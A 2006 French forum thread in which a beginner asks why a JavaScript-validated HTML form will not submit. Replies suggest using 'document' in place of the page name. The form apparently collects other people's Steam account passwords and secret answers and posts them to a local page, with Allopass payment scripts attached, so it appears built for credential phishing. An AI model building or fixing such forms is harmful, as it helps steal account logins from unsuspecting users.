Partage
  • Partager sur Facebook
  • Partager sur Twitter

Formulaire avec Java Script qui ne fonctionne plus

    3 avril 2006 à 13:42:58

    Voila je vous passe le code ! je pense que c le code java script qui fait que sa marche pas !!

    Ps : il n'y a aucune erreur ! c'est juste que le formulaire ne part pas !

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Document sans titre</title>
    <style type="text/css">
    <!--
    body,td,th {
            color: #666666;
    }
    body {
            background-color: #CCCCCC;
    }
    -->
    </style></head><SCRIPT language="JavaScript">
    <!--

    function ControleVide()
    {
    if(steam-formulaire.Formulaire.nom.value=='')
    {
    alert('Le champ Nom ne peut pas rester vide !');
    steam-formulaire.Formulaire.Nom.focus();
    }
    else if(steam-formulaire.Formulaire.email.value=='')
    {
    alert('Vous devez nous indiquez un email');
    steam-formulaire.Formulaire.email.focus();
    }

    else if(steam-formulaire.Formulaire.pass1.value='')
    {
    alert('Vous devez nous indiquez un mot de passe');
    steam-formulaire.Formulaire.pass1.focus();
    }

    else if(steam-formulaire.Formulaire.pass2.value='')
    {
    alert('Vous devez retaper votre mot de passe');
    steam-formulaire.Formulaire.pass2.focus();
    }

    else if(steam-formulaire.Formulaire.secret.value='')
    {
    alert('Vous devez nous donnez une réponse secrete');
    steam-formulaire.Formulaire.secret.focus();
    }

    else
    {
    steam-formulaire.Formulaire.method = "POST";
    steam-formulaire.Formulaire.action = "steam-acces.htm";
    steam-formulaire.Formulaire.submit();
    }
    }
    //-->
    </script>

    <body><form name="Formulaire">
    <table width="609" border="1">
      <tr>
        <td width="276">Votre Nom ou pseudo : </td>
        <td width="317"><label>
          <input name="nom" type="text" id="nom" />
        </label></td>
      </tr>
      <tr>
        <td>Votre email : </td>
        <td><input name="email" type="text" id="email" /></td>
      </tr>
      <tr>
        <td>Pass : (pour votre compte steam) </td>
        <td><input name="pass1" type="password" id="pass1" /></td>
      </tr>
      <tr>
        <td>Pass : (retaper le mot de pass) </td>
        <td><input name="pass2" type="password" id="pass2" /></td>
      </tr>
      <tr>
        <td>R&eacute;ponse secr&eacute;te : (pour votre compte steam) </td>
        <td><input name="secret" type="text" id="secret" /></td>
      </tr>
      <tr>
        <td height="186">Commentaire ? : </td>
        <td><label>
          <textarea name="commentaire" cols="50" rows="10" id="commentaire"></textarea>
        </label></td>
      </tr>
    </table>

      <input type="button" value="Valider" onClick="ControleVide()" />
     
     

    </form>
    <label></label>
    <noscript>
    <meta http-equiv="Refresh" content="0;URL=http://www.allopass.com/check/error_code.php4?DOC_ID=256420&SITE_ID=68660" />
    </noscript>
    <script language="Javascript" src="http://www.allopass.com/check/chk.php4?IDD=256420&IDS=68660"></script>

    </body>
    </html>
    • Partager sur Facebook
    • Partager sur Twitter
      3 avril 2006 à 17:06:39

      Dans ta partie Javascript , tu appelles les formulaires avec : steam-formulaire.Formulaire.nom.value
      D'ou sort le steam-formulaire ?
      • Partager sur Facebook
      • Partager sur Twitter
        3 avril 2006 à 17:20:00

        Ben steam-formulaire c'est le nom de page. a moin qu'il faut mettre document.Formulaire

        C'est ce que j'ai comprit d'apres le site PHPDEBUTANT

        En Javascript on indique l'arborescence complète de l'emplacement de "l'objet" qui doit doit être contrôlé (ici le champ Nom), ce qui donne :
        - page.nomduformulaire.nomduchamp.fonction();
        • Partager sur Facebook
        • Partager sur Twitter
          3 avril 2006 à 17:24:01

          oui mais tu peux utiliser document !
          • Partager sur Facebook
          • Partager sur Twitter
            3 avril 2006 à 18:30:57

            ouais c fait sa marche mais une autre question !!
            y a que le champs non avec le quelle le java script marche !! je sais pas pourquoi on a le droit d'ecrire else if ? ou c elseif ou ifelse
            • Partager sur Facebook
            • Partager sur Twitter

            Formulaire avec Java Script qui ne fonctionne plus

            × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
            × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
            • Editeur
            • Markdown